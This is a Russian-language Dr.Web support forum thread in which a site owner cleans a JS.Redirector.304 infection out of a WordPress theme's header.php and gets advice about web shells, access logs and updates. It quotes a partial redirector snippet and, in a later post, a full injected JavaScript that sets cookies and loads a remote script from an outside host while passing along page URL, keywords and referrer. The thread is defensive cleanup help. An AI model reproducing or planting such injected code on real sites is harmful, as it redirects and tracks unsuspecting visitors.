Перейти к содержимому


Фото
- - - - -

JS.Redirector.304


  • Please log in to reply
29 ответов в этой теме

#1 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 15 Июнь 2016 - 13:31

Добрый день! Я обслуживаю сайт http://reklama.khakassia.ru/, к сожалению сайт заражён JS.Redirector.304, как определил мой DrWeb Security Space, также о заражении предупреждают Яндекс и Гугл.

Можно как-то своими руками бесплатно вылечить сайт? Есть ли Онлайн-лечение сайтов от DoctorWeb?

Прикрепляю скриншоты.

Прикрепленные файлы:



#2 Dr.Robot

Dr.Robot

    Poster

  • Helpers
  • 3 102 Сообщений:

Отправлено 15 Июнь 2016 - 13:31

1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,

Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ - сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.

2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,

- попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
- детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
- дождаться ответа аналитика или хелпера;

3. Если у Вас зашифрованы файлы,

Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.

Что НЕ нужно делать:
- лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
- переустанавливать операционную систему;
- менять расширение у зашифрованных файлов;
- очищать папки с временными файлами, а также историю браузера;
- использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из "Аптечки сисадмина" Dr. Web;
- использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.

Что необходимо сделать:
- прислать в вирусную лабораторию Dr. Web https://support.drweb.com/new/free_unlocker/?keyno=&for_decode=1 несколько зашифрованных файлов и, если есть, их не зашифрованные копии в категорию Запрос на лечение. Дожидаться ответа на Вашу почту вирусного аналитика и далее следовать его указаниям ведя с ним переписку по почте. На форуме рекомендуется указать номер тикета вирлаба - это номер Вашего запроса, содержащий строку вида [drweb.com #3219200];


4. При возникновении проблем с интернетом, таких как "не открываются сайты", в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа "Содержание сайта заблокировано" и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig


Для этого проделайте следующее:

  • Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить...
  • В появившемся окне наберите cmd и нажмите клавишу <Enter>. Появится черное окно консоли (интерпретатора команд).
  • Напишите в этом черном окне команду ipconfig /all>"%userprofile%\ipc.log" и нажмите клавишу <Enter>, затем наберите там же команду explorer.exe /select,"%userprofile%\ipc.log" и нажмите клавишу <Enter>, нужный файл будет показан в Проводнике Windows.
  • Приложите этот файл к своему сообщению на форуме.
Чтобы не сделать ошибок в написании команд, можно скопировать эти команды отсюда и последовательно вставлять в черное окно консоли путем выбора пункта Вставить из меню, появляющегося при нажатии правой кнопки мыши в черном окне консоли.



#3 Ivan Korolev

Ivan Korolev

    Poster

  • Virus Analysts
  • 1 368 Сообщений:

Отправлено 15 Июнь 2016 - 13:54

Ваш сайт взломали, в коде страницы размещен вредоносный javascript. Изучайте логи, ищите что, где и как прописали после взлома.

 

Проще всего накатить не зараженную версию из бэкапов, если таковые имеются, конечно.


Сообщение было изменено Ivan Korolev: 15 Июнь 2016 - 13:55


#4 ivsero

ivsero

    Newbie

  • Posters
  • 77 Сообщений:

Отправлено 15 Июнь 2016 - 22:34

Детектируемая Dr.Web конструкция скорее всего находится либо в основном index.php, либо в index.php из папки шаблона. Выглядит она так (часть кода вырезал):

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src= [... обфусцированный код, удален ...]><'+'/script>');}</script>

ее нужно удалить из файла. 

Кроме того, у вас в папке сайта присутствует скорее всего один или несколько веб-шеллов, которые были загружены через одну из уязвимостей в WordPress. Скачайте скрипты себе на компьютер и проверьте Сканером Dr.Web. Далее внимательно глазами посмотрите на найденные объекты и удалите их с хостинга (пожалуй, все, кроме того, который детектируется как JS.Redirector.304 - из этого скрипта нужно удалить указанную выше конструкцию). 

Потом нужно обновить Wordpress, а также дополнения. 

 

Восстановить из бэкапа тоже вариант, конечно. Но в бэкапе скорее всего все еще будет веб-шелл, через который злоумышленники и внедрили код редиректора.


Сообщение было изменено ivsero: 15 Июнь 2016 - 22:35


#5 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 16 Июнь 2016 - 13:47

Детектируемая Dr.Web конструкция скорее всего находится либо в основном index.php, либо в index.php из папки шаблона. Выглядит она так (часть кода вырезал):

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src= [... обфусцированный код, удален ...]><'+'/script>');}</script>

ее нужно удалить из файла. 

Кроме того, у вас в папке сайта присутствует скорее всего один или несколько веб-шеллов, которые были загружены через одну из уязвимостей в WordPress. Скачайте скрипты себе на компьютер и проверьте Сканером Dr.Web. Далее внимательно глазами посмотрите на найденные объекты и удалите их с хостинга (пожалуй, все, кроме того, который детектируется как JS.Redirector.304 - из этого скрипта нужно удалить указанную выше конструкцию). 

Потом нужно обновить Wordpress, а также дополнения. 

 

Восстановить из бэкапа тоже вариант, конечно. Но в бэкапе скорее всего все еще будет веб-шелл, через который злоумышленники и внедрили код редиректора.

В указанных вами файлах скрипта не нашёл, файлы прикрепил сюда.

Первый index.php находится в корне сайта, а второй по пути:

reklama.khakassia.ru/wp-content/themes/HealthStyle/index.php 

На сайте всего одна тема (шаблон): HealthStyle

Прикрепленные файлы:

  • Прикрепленный файл  index.php   418байт   7 Скачано раз
  • Прикрепленный файл  index.php   1,54К   5 Скачано раз


#6 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 16 Июнь 2016 - 14:01

ivsero, У меня есть подозрение, что сам шаблон может быть изначально заражён, т.к. я его скачал бесплатно, а на самом деле он платный.



#7 ivsero

ivsero

    Newbie

  • Posters
  • 77 Сообщений:

Отправлено 16 Июнь 2016 - 14:20

Да, файлы чистые. Тогда скачайте скрипты и проверьте Сканером. Скорее всего, увидите детект.



#8 Ivan Korolev

Ivan Korolev

    Poster

  • Virus Analysts
  • 1 368 Сообщений:

Отправлено 16 Июнь 2016 - 14:24

ivsero, У меня есть подозрение, что сам шаблон может быть изначально заражён, т.к. я его скачал бесплатно, а на самом деле он платный.

Залейте куда-нибудь все файлы сайта и напишите ссылку для скачивания (можно в личку).



#9 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 16 Июнь 2016 - 17:48

ivsero, во время скачивания сайта DrWeb обнаружил указанный вами выше скрипт в файле


/domains/reklama.khakassia.ru/wp-content/themes/HealthStyle/header.php

Скрипт я удалил. Проверил так же сканером шаблон, который заливал на сайт - чистый.

Осталось дождаться пока сайт скачается полностью и проиндексировать заново вручную на Гугле и написать в Яндекс, чтобы сняли пометку 

небезопасного сайта.



#10 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 16 Июнь 2016 - 18:08

Проверил сканером скачанный сайт - чисто!  :)



#11 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 16 Июнь 2016 - 18:26

Ещё отключил доступ по FTP к сайту  :)



#12 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 16 Июнь 2016 - 18:31

Проверил сканером скачанный сайт - чисто!

Пришлось потом отдельно скачивать отредактированный мной (удалил скрипт) файл header.php и тогда только сканировать.



#13 Ivan Korolev

Ivan Korolev

    Poster

  • Virus Analysts
  • 1 368 Сообщений:

Отправлено 16 Июнь 2016 - 19:04

Вам осталось самое интересное - понять как этот js туда вставили, т.е. как сайт ломанули. Ну и предотвратить это в будущем ;)



#14 ivsero

ivsero

    Newbie

  • Posters
  • 77 Сообщений:

Отправлено 16 Июнь 2016 - 21:35

Elevyr, скорее всего, бэкдор все-таки остался. Если хостер ведет access-логи, проанализируйте их на предмет наличия POST-запросов к разным нетипичным скриптам: понятно, что для доступа к админке браузер отправляет данные POST-запросом и это нормально, но вот если POST-запросы отправляются к скриптам вроде reklama.khakassia.ru/wp-content/themes/ajax.php - это повод посмотреть на них поближе/отправить в вирлаб. Как разберетесь со всеми такими случаями, обновите CMS и плагины, а также поменяйте все пароли.



#15 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 12 Сентябрь 2016 - 15:30

Опять появился скрипт, в том же файле

Это тоже вирус?:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(B))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://baltapress.ru/js/jquery.min.php'+ '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>



#16 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 12 Сентябрь 2016 - 15:32

Но мой DrWeb его не видит



#17 Ivan Korolev

Ivan Korolev

    Poster

  • Virus Analysts
  • 1 368 Сообщений:

Отправлено 12 Сентябрь 2016 - 15:44

Ссылку на сайт дайте.



#18 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 13 Сентябрь 2016 - 11:42

Ссылку на сайт дайте.

 http://reklama.khakassia.ru/

 

но скрипт уже удалил


Сообщение было изменено Elevyr: 13 Сентябрь 2016 - 11:43


#19 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 13 Сентябрь 2016 - 11:45

А как снять предупреждение от DrWeb, что этот www.душаженщины.рф сайт инфицирован?

Я скрипт на нём удалил, а кому писать чтобы сняли предупреждение?



#20 Ivan Korolev

Ivan Korolev

    Poster

  • Virus Analysts
  • 1 368 Сообщений:

Отправлено 13 Сентябрь 2016 - 13:55

А как снять предупреждение от DrWeb, что этот www.душаженщины.рф сайт инфицирован?

Я скрипт на нём удалил, а кому писать чтобы сняли предупреждение?

Снял детект.




Читают тему: 0

0 пользователей, 0 гостей, 0 скрытых